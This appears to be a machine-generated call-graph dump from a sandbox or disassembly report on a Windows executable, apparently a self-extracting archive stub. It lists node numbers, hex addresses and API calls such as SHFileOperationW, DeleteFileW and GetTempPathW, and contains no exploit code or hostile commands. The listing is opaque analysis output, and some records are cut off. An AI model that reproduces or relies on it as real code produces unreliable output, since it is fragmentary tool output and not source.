24547->24596 24578 caab1a 24548->24578 24549 ca3c9f 24549->24547 24595 ca20bd 78 API calls 24549->24595 24551 ca3c8f 24594 ca138b 74 API calls 24551->24594 24552 ca3c71 24552->24547 24552->24549 24552->24551 24554 ca3d41 24558 ca3dd7 24554->24558 24559 ca3dc7 24554->24559 24602 cb3020 24558->24602 24582 ca9215 24559->24582 24562 ca3dd5 24562->24564 24611 ca2021 74 API calls 24562->24611 24612 cb2297 24564->24612 24565->24525 24566->24527 24567->24523 24569 cb338c 24568->24569 24571 cb3396 ___std_exception_copy 24568->24571 24619 ca6ca7 75 API calls 24569->24619 24572 cb341c 24571->24572 24573 cb34c6 24571->24573 24577 cb3440 __cftof 24571->24577 24620 cb32aa 75 API calls 3 library calls 24572->24620 24621 cc238d RaiseException 24573->24621 24576 cb34f2 24577->24552 24579 caab28 24578->24579 24581 caab32 24578->24581 24580 cbeb38 8 API calls 24579->24580 24580->24581 24581->24554 24583 ca921f __EH_prolog 24582->24583 24622 ca7c64 24583->24622 24586 ca13ba 78 API calls 24587 ca9231 24586->24587 24625 cad114 24587->24625 24589 ca928a 24589->24562 24591 cad114 119 API calls 24592 ca9243 24591->24592 24592->24589 24592->24591 24634 cad300 97 API calls __InternalCxxFrameHandler 24592->24634 24593->24544 24594->24564 24595->24547 24597 cad072 24596->24597 24598 cad084 24596->24598 24635 ca603a 82 API calls 24597->24635 24636 ca603a 82 API calls 24598->24636 24601 cad07c 24601->24548 24603 cb3029 24602->24603 24604 cb3052 24602->24604 24606 cb3048 24603->24606 24608 cb303e 24603->24608 24610 cb3046 24603->24610 24604->24610 24651 cb552f 124 API calls 2 library calls 24604->24651 24650 cb624a 119 API calls 24606->24650 24637 cb6cdc 24608->24637 24610->24562 24611->24564 24614 cb22a1 24612->24614 24613 cb22ba 24652 cb0eed 86 API calls 24613->24652 24614->24613 24617 cb22ce 24614->24617 24616 cb22c1 24616->24617 24618->24544 24619->24571 24620->24577 24621->24576 24623 cab146 GetVersionExW 24622->24623 24624 ca7c69 24623->24624 24624->24586 24631 cad12a __InternalCxxFrameHandler 24625->24631 24626 cad29a 24627 cad2ce 24626->24627 24628 cad0cb 6 API calls 24626->24628 24629 cb0e08 SetThreadExecutionState RaiseException 24627->24629 24628->24627 24632 cad291 24629->24632 24630 cb8c8d 104 API calls 24630->24631 24631->24626 24631->24630 24631->24632 24633 caac05 91 API calls 24631->24633 24632->24592 24633->24631 24634->24592 24635->24601 24636->24601 24638 cb359e 75 API calls 24637->24638 24645 cb6ced __InternalCxxFrameHandler 24638->24645 24639 cad114 119 API calls 24639->24645 24640 cb70fe 24641 cb5202 98 API calls 24640->24641 24642 cb710e __InternalCxxFrameHandler 24641->24642 24642->24610 24643 cb11cf 81 API calls 24643->24645 24644 cb3e0b 119 API calls 24644->24645 24645->24639 24645->24640 24645->24643 24645->24644 24646 cb7153 119 API calls 24645->24646 24647 cb0f86 88 API calls 24645->24647 24648 cb77ef 124 API calls 24645->24648 24649 cb390d 98 API calls 24645->24649 24646->24645 24647->24645 24648->24645 24649->24645 24650->24610 24651->24610 24652->24616 24653->24347 24654->24347 24655->24349 24657 ca5d2a 24656->24657 24702 ca5c4b 24657->24702 24659 ca5d5d 24661 ca5d95 24659->24661 24707 cab1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 24659->24707 24661->24363 24663 ca8186 24662->24663 24664 ca8232 24663->24664 24714 cabe5e 19 API calls __InternalCxxFrameHandler 24663->24714 24713 cb1fac CharUpperW 24664->24713 24667 ca823b 24667->24366 24669 ca7c22 24668->24669 24670 ca7c5a 24669->24670 24715 ca6e7a 74 API calls 24669->24715 24670->24376 24672 ca7c52 24716 ca138b 74 API calls 24672->24716 24675 ca9db3 24674->24675 24678 ca9dc2 24674->24678 24676 ca9db9 FlushFileBuffers 24675->24676 24675->24678 24676->24678 24677 ca9e3f SetFileTime 24677->24434 24678->24677 24679->24355 24680->24362 24681->24362 24682->24376 24683->24376 24684->24372 24685->24382 24686->24378 24687->24382 24689 ca8b5a 24688->24689 24690 ca98c5 GetFileType 24688->24690 24689->24398 24691 ca2021 74 API calls 24689->24691 24690->24689 24691->24396 24692->24398 24693->24400 24694->24424 24695->24424 24696->24424 24697->24424 24698->24427 24699->24429 24700->24437 24701->24428 24708 ca5b48 24702->24708 24704 ca5c6c 24704->24659 24706 ca5b48 2 API calls 24706->24704 24707->24659 24710 ca5b52 24708->24710 24709 ca5c3a 24709->24704 24709->24706 24710->24709 24712 cab1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 24710->24712 24712->24710 24713->24667 24714->24664 24715->24672 24716->24670 24718->24445 24720 caa6a8 24719->24720 24721 caa6c1 FindFirstFileW 24720->24721 24722 caa727 FindNextFileW 24720->24722 24723 caa6d0 24721->24723 24729 caa709 24721->24729 24724 caa732 GetLastError 24722->24724 24722->24729 24725 cabb03 GetCurrentDirectoryW 24723->24725 24724->24729 24726 caa6e0 24725->24726 24727 caa6fe GetLastError 24726->24727 24728 caa6e4 FindFirstFileW 24726->24728 24727->24729 24728->24727 24728->24729 24729->24297 24739 cba5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24730->24739 24732 cba5cd 24733 cba5d9 24732->24733 24740 cba605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24732->24740 24733->24097 24733->24098 24735->24101 24736->24107 24737->24107 24738->24110 24739->24732 24740->24733 24741->24115 24743 ca9f42 78 API calls 24742->24743 24744 ca1fe8 24743->24744 24745 ca1a04 102 API calls 24744->24745 24748 ca2005 24744->24748 24746 ca1ff5 24745->24746 24746->24748 24749 ca138b 74 API calls 24746->24749 24748->24124 24748->24125 24749->24748 24750 ca13e1 84 API calls 2 library calls 25517 cb94e0 GetClientRect 25552 cb21e0 26 API calls std::bad_exception::bad_exception 25578 cbf2e0 46 API calls __RTC_Initialize 24751 cbeae7 24752 cbeaf1 24751->24752 24753 cbe85d ___delayLoadHelper2@8 14 API calls 24752->24753 24754 cbeafe 24753->24754 25518 cbf4e7 29 API calls _abort 25579 ccbee0 GetCommandLineA GetCommandLineW 25519 cc2cfb 38 API calls 4 library calls 25553 ca95f0 80 API calls 25554 cbfd4f 9 API calls 2 library calls 25580 ca5ef0 82 API calls 24771 cc98f0 24779 ccadaf 24771->24779 24775 cc990c 24776 cc9919 24775->24776 24787 cc9920 11 API calls 24775->24787 24778 cc9904 24788 ccac98 24779->24788 24782 ccadee TlsAlloc 24785 ccaddf 24782->24785 24783 cbfbbc CatchGuardHandler 5 API calls 24784 cc98fa 24783->24784 24784->24778 24786 cc9869 20 API calls 2 library calls 24784->24786 24785->24783 24786->24775 24787->24778 24789 ccacc8 24788->24789 24793 ccacc4 24788->24793 24789->24782 24789->24785 24790 ccace8 24790->24789 24792 ccacf4 GetProcAddress 24790->24792 24794 ccad04 __dosmaperr 24792->24794 24793->24789 24793->24790 24795 ccad34 24793->24795 24794->24789 24796 ccad4a 24795->24796 24797 ccad55 LoadLibraryExW 24795->24797 24796->24793 24798 ccad72 GetLastError 24797->24798 24800 ccad8a 24797->24800 24799 ccad7d LoadLibraryExW 24798->24799 24798->24800 24799->24800 24800->24796 24801 ccada1 FreeLibrary 24800->24801 24801->24796 24802 ccabf0 24803 ccabfb 24802->24803 24805 ccac24 24803->24805 24806 ccac20 24803->24806 24808 ccaf0a 24803->24808 24815 ccac50 DeleteCriticalSection 24805->24815 24809 ccac98 __dosmaperr 5 API calls 24808->24809 24810 ccaf31 24809->24810 24811 ccaf4f InitializeCriticalSectionAndSpinCount 24810->24811 24812 ccaf3a 24810->24812 24811->24812 24813 cbfbbc CatchGuardHandler 5 API calls 24812->24813 24814 ccaf66 24813->24814 24814->24803 24815->24806 25520 cc88f0 7 API calls ___scrt_uninitialize_crt 25522 cbc793 98 API calls 4 library calls 25557 cbb18d 78 API calls 25559 cb9580 6 API calls 24830 cbce87 24831 cbce90 GetTempPathW 24830->24831 24849 cbc793 _wcslen _wcsrchr 24830->24849 24836 cbceb0 24831->24836 24832 cbb314 ExpandEnvironmentStringsW 24832->24849 24833 cbd40a 24834 ca4092 _swprintf 51 API calls 24834->24836 24835 caa231 3 API calls 24835->24836 24836->24834 24836->24835 24837 cbcee7 SetDlgItemTextW 24836->24837 24840 cbcf04 24837->24840 24837->24849 24839 cbca67 SetWindowTextW 24839->24849 24843 cbcfea EndDialog 24840->24843 24840->24849 24843->24849 24844 cc3e3e 22 API calls 24844->24849 24846 cbc855 SetFileAttributesW 24848 cbc90f GetFileAttributesW 24846->24848 24859 cbc86f __cftof _wcslen 24846->24859 24848->24849 24851 cbc921 DeleteFileW 24848->24851 24849->24832 24849->24833 24849->24839 24849->24844 24849->24846 24852 cbcc31 GetDlgItem SetWindowTextW SendMessageW 24849->24852 24855 cbcc71 SendMessageW 24849->24855 24861 cb1fbb CompareStringW 24849->24861 24862 cba64d GetCurrentDirectoryW 24849->24862 24864 caa5d1 6 API calls 24849->24864 24865 caa55a FindClose 24849->24865 24866 cbb48e 76 API calls 2 library calls 24849->24866 24851->24849 24853 cbc932 24851->24853 24852->24849 24854 ca4092 _swprintf 51 API calls 24853->24854 24856 cbc952 GetFileAttributesW 24854->24856 24855->24849 24856->24853 24857 cbc967 MoveFileW 24856->24857 24857->24849 24858 cbc97f MoveFileExW 24857->24858 24858->24849 24859->24849 24860 cbc8eb SHFileOperationW 24859->24860 24863 cab991 51 API calls 2 library calls 24859->24863 24860->24848 24861->24849 24862->24849 24863->24859 24864->24849 24865->24849 24866->24849 25596 ca6faa 111 API calls 3 library calls 25525 cbdca1 DialogBoxParamW 25597 cbf3a0 27 API calls 25527 cca4a0 71 API calls _free 25561 cbeda7 48 API calls _unexpected 25529 cd08a0 IsProcessorFeaturePresent 25562 ccb1b8 27 API calls 3 library calls 25598 cb1bbd GetCPInfo IsDBCSLeadByte 24887 cbf3b2 24888 cbf3be ___scrt_is_nonwritable_in_current_image 24887->24888 24919 cbeed7 24888->24919 24890 cbf3c5 24891 cbf518 24890->24891 24894 cbf3ef 24890->24894 24992 cbf838 4 API calls 2 library calls 24891->24992 24893 cbf51f 24985 cc7f58 24893->24985 24906 cbf42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24894->24906 24930 cc8aed 24894->24930 24901 cbf40e 24903 cbf48f 24938 cbf953 GetStartupInfoW __cftof 24903->24938 24905 cbf495 24939 cc8a3e 51 API calls 24905->24939 24906->24903 24988 cc7af4 38 API calls 3 library calls 24906->24988 24909 cbf49d 24940 cbdf1e 24909->24940 24913 cbf4b1 24913->24893 24914 cbf4b5 24913->24914 24915 cbf4be 24914->24915 24990 cc7efb 28 API calls _abort 24914->24990 24991 cbf048 12 API calls ___scrt_uninitialize_crt 24915->24991 24918 cbf4c6 24918->24901 24920 cbeee0 24919->24920 24994 cbf654 IsProcessorFeaturePresent 24920->24994 24922 cbeeec 24995 cc2a5e 24922->24995 24924 cbeef1 24925 cbeef5 24924->24925 25003 cc8977 24924->25003 24925->24890 24928 cbef0c 24928->24890 24931 cc8b04 24930->24931 24932 cbfbbc CatchGuardHandler 5 API calls 24931->24932 24933 cbf408 24932->24933 24933->24901 24934 cc8a91 24933->24934 24935 cc8ac0 24934->24935 24936 cbfbbc CatchGuardHandler 5 API calls 24935->24936 24937 cc8ae9 24936->24937 24937->24906 24938->24905 24939->24909 25096 cb0863 24940->25096 24944 cbdf3d 25145 cbac16 24944->25145 24946 cbdf46 __cftof 24947 cbdf59 GetCommandLineW 24946->24947 24948 cbdf68 24947->24948 24949 cbdfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24947->24949 25149 cbc5c4 24948->25149 24950 ca4092 _swprintf 51 API calls 24949->24950 24952 cbe04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24950->24952 25160 cbb6dd LoadBitmapW 24952->25160 24955 cbdfe0 25154 cbdbde 24955->25154 24956 cbdf76 OpenFileMappingW 24959 cbdf8f MapViewOfFile 24956->24959 24960 cbdfd6 CloseHandle 24956->24960 24962 cbdfcd UnmapViewOfFile 24959->24962 24963 cbdfa0 __InternalCxxFrameHandler 24959->24963 24960->24949 24962->24960 24967 cbdbde 2 API calls 24963->24967 24969 cbdfbc 24967->24969 24968 cb90b7 8 API calls 24970 cbe0aa DialogBoxParamW 24968->24970 24969->24962 24971 cbe0e4 24970->24971 24972 cbe0fd 24971->24972 24973 cbe0f6 Sleep 24971->24973 24976 cbe10b 24972->24976 25187 cbae2f 24972->25187 24973->24972 24975 cbe12a DeleteObject 24977 cbe13f DeleteObject 24975->24977 24978 cbe146 24975->24978 24976->24975 24977->24978 24979 cbe189 24978->24979 24980 cbe177 24978->24980 25195 cbac7c 24979->25195 24981 cbdc3b 6 API calls 24980->24981 24982 cbe17d CloseHandle 24981->24982 24982->24979 24984 cbe1c3 24989 cbf993 GetModuleHandleW 24984->24989 25333 cc7cd5 24985->25333 24988->24903 24989->24913 24990->24915 24991->24918 24992->24893 24994->24922 25007 cc3b07 24995->25007 24998 cc2a67 24998->24924 25000 cc2a6f 25001 cc2a7a 25000->25001 25021 cc3b43 DeleteCriticalSection 25000->25021 25001->24924 25050 ccc05a 25003->25050 25006 cc2a7d 7 API calls 2 library calls 25006->24925 25008 cc3b10 25007->25008 25010 cc3b39 25008->25010 25011 cc2a63 25008->25011 25022 cc3d46 25008->25022 25027 cc3b43 DeleteCriticalSection 25010->25027 25011->24998 25013 cc2b8c 25011->25013 25043 cc3c57 25013->25043 25016 cc2ba1 25016->25000 25018 cc2baf 25019 cc2bbc 25018->25019 25049 cc2bbf 6 API calls ___vcrt_FlsFree 25018->25049 25019->25000 25021->24998 25028 cc3c0d 25022->25028 25025 cc3d7e InitializeCriticalSectionAndSpinCount 25026 cc3d69 25025->25026 25026->25008 25027->25011 25029 cc3c4f 25028->25029 25030 cc3c26 25028->25030 25029->25025 25029->25026 25030->25029 25035 cc3b72 25030->25035 25033 cc3c3b GetProcAddress 25033->25029 25034 cc3c49 25033->25034 25034->25029 25036 cc3b7e ___vcrt_FlsSetValue 25035->25036 25037 cc3bf3 25036->25037 25038 cc3b95 LoadLibraryExW 25036->25038 25042 cc3bd5 LoadLibraryExW 25036->25042 25037->25029 25037->25033 25039 cc3bfa 25038->25039 25040 cc3bb3 GetLastError 25038->25040 25039->25037 25041 cc3c02 FreeLibrary 25039->25041 25040->25036 25041->25037 25042->25036 25042->25039 25044 cc3c0d ___vcrt_FlsSetValue 5 API calls 25043->25044 25045 cc3c71 25044->25045 25046 cc3c8a TlsAlloc 25045->25046 25047 cc2b96 25045->25047 25047->25016 25048 cc3d08 6 API calls ___vcrt_FlsSetValue 25047->25048 25048->25018 25049->25016 25053 ccc077 25050->25053 25054 ccc073 25050->25054 25051 cbfbbc CatchGuardHandler 5 API calls 25052 cbeefe 25051->25052 25052->24928 25052->25006 25053->25054 25056 cca6a0 25053->25056 25054->25051 25057 cca6ac ___scrt_is_nonwritable_in_current_image 25056->25057 25068 ccac31 EnterCriticalSection 25057->25068 25059 cca6b3 25069 ccc528 25059->25069 25061 cca6c2 25066 cca6d1 25061->25066 25082 cca529 29 API calls 25061->25082 25064 cca6cc 25083 cca5df GetStdHandle GetFileType 25064->25083 25084 cca6ed LeaveCriticalSection _abort 25066->25084 25067 cca6e2 _abort 25067->25053 25068->25059 25070 ccc534 ___scrt_is_nonwritable_in_current_image 25069->25070 25071 ccc558 25070->25071 25072 ccc541 25070->25072 25085 ccac31 EnterCriticalSection 25071->25085 25093 cc91a8 20 API calls __dosmaperr 25072->25093 25075 ccc546 25094 cc9087 26 API calls ___std_exception_copy 25075->25094 25077 ccc550 _abort 25077->25061 25078 ccc590 25095 ccc5b7 LeaveCriticalSection _abort 25078->25095 25080 ccc564 25080->25078 25086 ccc479 25080->25086 25082->25064 25083->25066 25084->25067 25085->25080 25087 ccb136 __dosmaperr 20 API calls 25086->25087 25088 ccc48b 25087->25088 25090 ccaf0a 11 API calls 25088->25090 25092 ccc498 25088->25092 25089 cc8dcc _free 20 API calls 25091 ccc4ea 25089->25091 25090->25088 25091->25080 25092->25089 25093->25075 25094->25077 25095->25077 25097 cbec50 25096->25097 25098 cb086d GetModuleHandleW 25097->25098 25099 cb0888 GetProcAddress 25098->25099 25100 cb08e7 25098->25100 25102 cb08b9 GetProcAddress 25099->25102 25105 cb08a1 25099->25105 25101 cb0c14 GetModuleFileNameW 25100->25101 25207 cc75fb 42 API calls __vsnwprintf_l 25100->25207 25117 cb0c32 25101->25117 25106 cb08cb 25102->25106 25104 cb0b54 25104->25101 25107 cb0b5f GetModuleFileNameW CreateFileW 25104->25107 25105->25102 25106->25100 25108 cb0c08 CloseHandle 25107->25108 25109 cb0b8f SetFilePointer 25107->25109 25108->25101 25109->25108 25110 cb0b9d ReadFile 25109->25110 25110->25108 25112 cb0bbb 25110->25112 25112->25108 25118 cb081b 2 API calls 25112->25118 25114 cb0c94 GetFileAttributesW 25116 cb0cac 25114->25116 25114->25117 25115 cb0c5d CompareStringW 25115->25117 25119 cb0cb7 25116->25119 25121 cb0cec 25116->25121 25117->25114 25117->25115 25117->25116 25198 cab146 25117->25198 25201 cb081b 25117->25201 25118->25112 25122 cb0cd0 GetFileAttributesW 25119->25122 25124 cb0ce8 25119->25124 25120 cb0dfb 25144 cba64d GetCurrentDirectoryW 25120->25144 25121->25120 25123 cab146 GetVersionExW 25121->25123 25122->25119 25122->25124 25125 cb0d06 25123->25125 25124->25121 25126 cb0d0d 25125->25126 25127 cb0d73 25125->25127 25129 cb081b 2 API calls 25126->25129 25128 ca4092 _swprintf 51 API calls 25127->25128 25130 cb0d9b AllocConsole 25128->25130 25131 cb0d17 25129->25131 25132 cb0da8 GetCurrentProcessId AttachConsole 25130->25132 25133 cb0df3 ExitProcess 25130->25133 25134 cb081b 2 API calls 25131->25134 25208 cc3e13 25132->25208 25136 cb0d21 25134->25136 25138 cae617 53 API calls 25136->25138 25139 cb0d3c 25138->25139 25140 ca4092 _swprintf 51 API calls 25139->25140 25141 cb0d4f 25140->25141 25142 cae617 53 API calls 25141->25142 25143 cb0d5e 25142->25143 25143->25133 25144->24944 25146 cb081b 2 API calls 25145->25146 25147 cbac2a OleInitialize 25146->25147 25148 cbac4d GdiplusStartup SHGetMalloc 25147->25148 25148->24946 25152 cbc5ce 25149->25152 25150 cbc6e4 25150->24955 25150->24956 25151 cb1fac CharUpperW 25151->25152 25152->25150 25152->25151 25210 caf3fa 82 API calls 2 library calls 25152->25210 25155 cbec50 25154->25155 25156 cbdbeb SetEnvironmentVariableW 25155->25156 25158 cbdc0e 25156->25158 25157 cbdc36 25157->24949 25158->25157 25159 cbdc2a SetEnvironmentVariableW 25158->25159 25159->25157 25161 cbb70b GetObjectW 25160->25161 25162 cbb6fe 25160->25162 25164 cbb71a 25161->25164 25211 cba6c2 FindResourceW 25162->25211 25165 cba5c6 4 API calls 25164->25165 25167 cbb72d 25165->25167 25168 cbb770 25167->25168 25169 cbb74c 25167->25169 25170 cba6c2 13 API calls 25167->25170 25179 cada42 25168->25179 25227 cba605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25169->25227 25172 cbb73d 25170->25172 25172->25169 25174 cbb743 DeleteObject 25172->25174 25173 cbb754 25228 cba5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25173->25228 25174->25169 25176 cbb75d 25229 cba80c 8 API calls 25176->25229 25178 cbb764 DeleteObject 25178->25168 25238 cada67 25179->25238 25184 cb90b7 25185 cbeb38 8 API calls 25184->25185 25186 cb90d6 25185->25186 25186->24968 25188 cbae3c 25187->25188 25191 cbaeca 25188->25191 25329 cb1fdd 25188->25329 25190 cbae64 25190->25191 25332 cbac04 SetCurrentDirectoryW 25190->25332 25191->24976 25193 cbae72 __cftof _wcslen 25194 cbaea6 SHFileOperationW 25193->25194 25194->25191 25196 cbacab GdiplusShutdown CoUninitialize 25195->25196 25196->24984 25199 cab15a GetVersionExW 25198->25199 25200 cab196 25198->25200 25199->25200 25200->25117 25202 cbec50 25201->25202 25203 cb0828 GetSystemDirectoryW 25202->25203 25204 cb085e 25203->25204 25205 cb0840 25203->25205 25204->25117 25206 cb0851 LoadLibraryW 25205->25206 25206->25204 25207->25104 25209 cb0dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 25208->25209 25209->25133 25210->25152 25212 cba6e5 SizeofResource 25211->25212 25213 cba7d3 25211->25213 25212->25213 25214 cba6fc LoadResource 25212->25214 25213->25161 25213->25164 25214->25213 25215 cba711 LockResource 25214->25215 25215->25213 25216 cba722 GlobalAlloc 25215->25216 25216->25213 25217 cba73d GlobalLock 25216->25217 25218 cba7cc GlobalFree 25217->25218 25219 cba74c __InternalCxxFrameHandler 25217->25219 25218->25213 25220 cba754 CreateStreamOnHGlobal 25219->25220 25221 cba76c 25220->25221 25222 cba7c5 GlobalUnlock 25220->25222 25230 cba626 GdipAlloc 25221->25230 25222->25218 25225 cba79a GdipCreateHBITMAPFromBitmap 25226 cba7b0 25225->25226 25226->25222 25227->25173 25228->25176 25229->25178 25231 cba638 25230->25231 25233 cba645 25230->25233 25234 cba3b9 25231->25234 25233->25222 25233->25225 25233->25226 25235 cba3da GdipCreateBitmapFromStreamICM 25234->25235 25236 cba3e1 GdipCreateBitmapFromStream 25234->25236 25237 cba3e6 25235->25237 25236->25237 25237->25233 25239 cada75 __EH_prolog 25238->25239 25240 cadaa4 GetModuleFileNameW 25239->25240 25241 cadad5 25239->25241 25242 cadabe 25240->25242 25284 ca98e0 25241->25284 25242->25241 25244 cadb31 25295 cc6310 25244->25295 25245 ca959a 80 API calls 25246 cada4e 25245->25246 25282 cae29e GetModuleHandleW FindResourceW 25246->25282 25248 cadb05 25248->25244 25251 cae261 78 API calls 25248->25251 25262 cadd4a 25248->25262 25249 cadb44 25250 cc6310 26 API calls 25249->25250 25259 cadb56 ___vcrt_FlsSetValue 25250->25259 25251->25248 25252 cadc85 25252->25262 25315 ca9d70 81 API calls 25252->25315 25254 ca9e80 79 API calls 25254->25259 25256 cadc9f ___std_exception_copy 25257 ca9bd0 82 API calls 25256->25257 25256->25262 25260 cadcc8 ___std_exception_copy 25257->25260 25259->25252 25259->25254 25259->25262 25309 ca9bd0 25259->25309 25314 ca9d70 81 API calls 25259->25314 25260->25262 25279 cadcd3 ___vcrt_FlsSetValue _wcslen ___std_exception_copy 25260->25279 25316 cb1b84 MultiByteToWideChar 25260->25316 25262->25245 25263 cae159 25269 cae1de 25263->25269 25322 cc8cce 26 API calls ___std_exception_copy 25263->25322 25266 cae16e 25323 cc7625 26 API calls ___std_exception_copy 25266->25323 25268 cae1c6 25324 cae27c 78 API calls 25268->25324 25270 cae214 25269->25270 25272 cae261 78 API calls 25269->25272 25273 cc6310 26 API calls 25270->25273 25272->25269 25274 cae22d 25273->25274 25275 cc6310 26 API calls 25274->25275 25275->25262 25278 cb1da7 WideCharToMultiByte 25278->25279 25279->25262 25279->25263 25279->25278 25317 cae5b1 50 API calls __vsnprintf 25279->25317 25318 cc6159 26 API calls 3 library calls 25279->25318 25319 cc8cce 26 API calls ___std_exception_copy 25279->25319 25320 cc7625 26 API calls ___std_exception_copy 25279->25320 25321 cae27c 78 API calls 25279->25321 25283 cada55 25282->25283 25283->25184 25285 ca98ea 25284->25285 25286 ca994b CreateFileW 25285->25286 25287 ca996c GetLastError 25286->25287 25290 ca99bb 25286->25290 25288 cabb03 GetCurrentDirectoryW 25287->25288 25289 ca998c 25288->25289 25289->25290 25292 ca9990 CreateFileW GetLastError 25289->25292 25291 ca99ff 25290->25291 25293 ca99e5 SetFileTime 25290->25293 25291->25248 25292->25290 25294 ca99b5 25292->25294 25293->25291 25294->25290 25296 cc6349 25295->25296 25297 cc634d 25296->25297 25308 cc6375 25296->25308 25325 cc91a8 20 API calls __dosmaperr 25297->25325 25299 cc6699 25302 cbfbbc CatchGuardHandler 5 API calls 25299->25302 25300 cc6352 25326 cc9087 26 API calls ___std_exception_copy 25300->25326 25304 cc66a6 25302->25304 25303 cc635d 25305 cbfbbc CatchGuardHandler 5 API calls 25303->25305 25304->25249 25306 cc6369 25305->25306 25306->25249 25308->25299 25327 cc6230 5 API calls CatchGuardHandler 25308->25327 25310 ca9bdc 25309->25310 25313 ca9be3 25309->25313 25310->25259 25311 ca9785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25311->25313 25313->25310 25313->25311 25328 ca6d1a 77 API calls 25313->25328 25314->25259 25315->25256 25316->25279 25317->25279 25318->25279 25319->25279 25320->25279 25321->25279 25322->25266 25323->25268 25324->25269 25325->25300 25326->25303 25327->25308 25328->25313 25330 cb1fea _wcslen 25329->25330 25331 cb201d CompareStringW 25330->25331 25331->25190 25332->25193 25334 cc7ce1 _unexpected 25333->25334 25335 cc7ce8 25334->25335 25336 cc7cfa 25334->25336 25369 cc7e2f GetModuleHandleW 25335->25369 25357 ccac31 EnterCriticalSection 25336->25357 25339 cc7ced 25339->25336 25370 cc7e73 GetModuleHandleExW 25339->25370 25340 cc7d9f 25358 cc7ddf 25340->25358 25344 cc7d76 25348 cc7d8e 25344->25348 25353 cc8a91 _abort 5 API calls 25344->25353 25346 cc7dbc 25361 cc7dee 25346->25361 25347 cc7de8 25379 cd2390 5 API calls CatchGuardHandler 25347->25379 25354 cc8a91 _abort 5 API calls 25348->25354 25349 cc7d01 25349->25340 25349->25344 25378 cc87e0 20 API calls _abort 25349->25378 25353->25348 25354->25340 25357->25349 25380 ccac81 LeaveCriticalSection 25358->25380 25360 cc7db8 25360->25346 25360->25347 25381 ccb076 25361->25381 25364 cc7e1c 25367 cc7e73 _abort 8 API calls 25364->25367 25365 cc7dfc GetPEB 25365->25364 25366 cc7e0c GetCurrentProcess TerminateProcess 25365->25366 25366->25364 25368 cc7e24 ExitProcess 25367->25368 25369->25339 25371 cc7e9d GetProcAddress 25370->25371 25372 cc7ec0 25370->25372 25375 cc7eb2 25371->25375 25373 cc7ecf 25372->25373 25374 cc7ec6 FreeLibrary 25372->25374 25376 cbfbbc CatchGuardHandler 5 API calls 25373->25376 25374->25373 25375->25372 25377 cc7cf9 25376->25377 25377->25336 25378->25344 25380->25360 25382 ccb09b 25381->25382 25386 ccb091 25381->25386 25383 ccac98 __dosmaperr 5 API calls 25382->25383 25383->25386 25384 cbfbbc CatchGuardHandler 5 API calls 25385 cc7df8 25384->25385 25385->25364 25385->25365 25386->25384 25563 cbb1b0 GetDlgItem KiUserCallbackDispatcher ShowWindow SendMessageW 23500 cbe44b 23502 cbe3f4 23500->23502 23503 cbe85d 23502->23503 23529 cbe5bb 23503->23529 23505 cbe86d 23506 cbe8ca 23505->23506 23507 cbe8ee 23505->23507 23508 cbe7fb DloadReleaseSectionWriteAccess 6 API calls 23506->23508 23511 cbe966 LoadLibraryExA 23507->23511 23513 cbe9c7 23507->23513 23520 cbe9d9 23507->23520 23524 cbea95 23507->23524 23509 cbe8d5 RaiseException 23508->23509 23510 cbeac3 23509->23510 23510->23502 23512 cbe979 GetLastError 23511->23512 23511->23513 23515 cbe98c 23512->23515 23516 cbe9a2 23512->23516 23514 cbe9d2 FreeLibrary 23513->23514 23513->23520 23514->23520 23515->23513 23515->23516 23518 cbe7fb DloadReleaseSectionWriteAccess 6 API calls 23516->23518 23517 cbea37 GetProcAddress 23519 cbea47 GetLastError 23517->23519 23517->23524 23521 cbe9ad RaiseException 23518->23521 23522 cbea5a 23519->23522 23520->23517 23520->23524 23521->23510 23522->23524 23525 cbe7fb DloadReleaseSectionWriteAccess 6 API calls 23522->23525 23538 cbe7fb 23524->23538 23526 cbea7b RaiseException 23525->23526 23527 cbe5bb ___delayLoadHelper2@8 6 API calls 23526->23527 23528 cbea92 23527->23528 23528->23524 23530 cbe5ed 23529->23530 23531 cbe5c7 23529->23531 23530->23505 23546 cbe664 23531->23546 23533 cbe5cc 23534 cbe5e8 23533->23534 23549 cbe78d 23533->23549 23554 cbe5ee GetModuleHandleW GetProcAddress GetProcAddress 23534->23554 23537 cbe836 23537->23505 23539 cbe82f 23538->23539 23540 cbe80d 23538->23540 23539->23510 23541 cbe664 DloadReleaseSectionWriteAccess 3 API calls 23540->23541 23542 cbe812 23541->23542 23543 cbe82a 23542->23543 23545 cbe78d DloadProtectSection 3 API calls 23542->23545 23557 cbe831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23543->23557 23545->23543 23555 cbe5ee GetModuleHandleW GetProcAddress GetProcAddress 23546->23555 23548 cbe669 23548->23533 23551 cbe7a2 DloadProtectSection 23549->23551 23550 cbe7a8 23550->23534 23551->23550 23552 cbe7dd VirtualProtect 23551->23552 23556 cbe6a3 VirtualQuery GetSystemInfo 23551->23556 23552->23550 23554->23537 23555->23548 23556->23552 23557->23539 25531 cba440 GdipCloneImage GdipAlloc 25581 cc3a40 5 API calls CatchGuardHandler 25600 cd1f40 CloseHandle 23693 cbcd58 23694 cbce22 23693->23694 23700 cbcd7b 23693->23700 23709 cbc793 _wcslen _wcsrchr 23694->23709 23722 cbd78f 23694->23722 23697 cbd40a 23699 cb1fbb CompareStringW 23699->23700 23700->23694 23700->23699 23701 cbca67 SetWindowTextW 23701->23709 23706 cbc855 SetFileAttributesW 23708 cbc90f GetFileAttributesW 23706->23708 23719 cbc86f __cftof _wcslen 23706->23719 23708->23709 23711 cbc921 DeleteFileW 23708->23711 23709->23697 23709->23701 23709->23706 23712 cbcc31 GetDlgItem SetWindowTextW SendMessageW 23709->23712 23715 cbcc71 SendMessageW 23709->23715 23721 cb1fbb CompareStringW 23709->23721 23747 cbb314 23709->23747 23751 cba64d GetCurrentDirectoryW 23709->23751 23753 caa5d1 6 API calls 23709->23753 23754 caa55a FindClose 23709->23754 23755 cbb48e 76 API calls 2 library calls 23709->23755 23756 